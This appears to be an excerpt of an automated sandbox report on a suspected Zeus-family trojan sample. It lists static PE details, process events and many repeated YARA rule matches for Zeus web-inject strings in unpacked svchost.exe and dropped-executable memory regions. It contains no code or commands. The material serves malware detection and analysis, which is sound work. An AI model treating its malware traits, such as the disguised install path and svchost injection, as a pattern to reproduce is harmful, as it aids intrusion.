    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C9D309_2_027C9D30
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Process token adjusted: Security
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
    Source: svchost.exe.0.dr Static PE information: Number of sections : 13 > 10
    Source: arxtPs1STE.exe Static PE information: Number of sections : 13 > 10
    Source: arxtPs1STE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 2.3.svchost.exe.2c70000.17.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    The same rule, with identical metadata, also matched the following sources (type: UNPACKEDPE):
    Source: 2.3.svchost.exe.2c70000.10.unpack
    Source: 2.3.svchost.exe.883000.4.raw.unpack
    Source: 2.3.svchost.exe.889000.0.raw.unpack
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.unpack
    Source: 2.3.svchost.exe.2c70000.39.unpack
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.raw.unpack
    Source: 2.3.svchost.exe.2c70000.38.unpack
    Source: 2.3.svchost.exe.2c70000.22.raw.unpack
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.raw.unpack
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.unpack
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.unpack
    Source: 2.3.svchost.exe.2c70000.13.raw.unpack
    Source: 2.3.svchost.exe.2c70000.50.unpack
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.unpack
    Source: 2.3.svchost.exe.2c70000.8.unpack
    Source: 2.2.svchost.exe.2a02000.3.unpack
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.raw.unpack
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.raw.unpack
    Source: 2.3.svchost.exe.2c70000.53.raw.unpack
    Source: 2.3.svchost.exe.2c70000.11.raw.unpack
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.raw.unpack
    Source: 2.3.svchost.exe.2c70000.49.raw.unpack
    Source: 2.3.svchost.exe.2c70000.19.raw.unpack
    Source: 2.3.svchost.exe.2c70000.23.raw.unpack
    Source: 2.3.svchost.exe.2c70000.52.raw.unpack
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.unpack
    Source: 2.3.svchost.exe.888400.2.unpack
    Source: 2.3.svchost.exe.2c70000.42.unpack
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.unpack
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.raw.unpack
    Source: 2.3.svchost.exe.2c70000.31.raw.unpack
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.49.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2bb0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.780618.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.4190000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
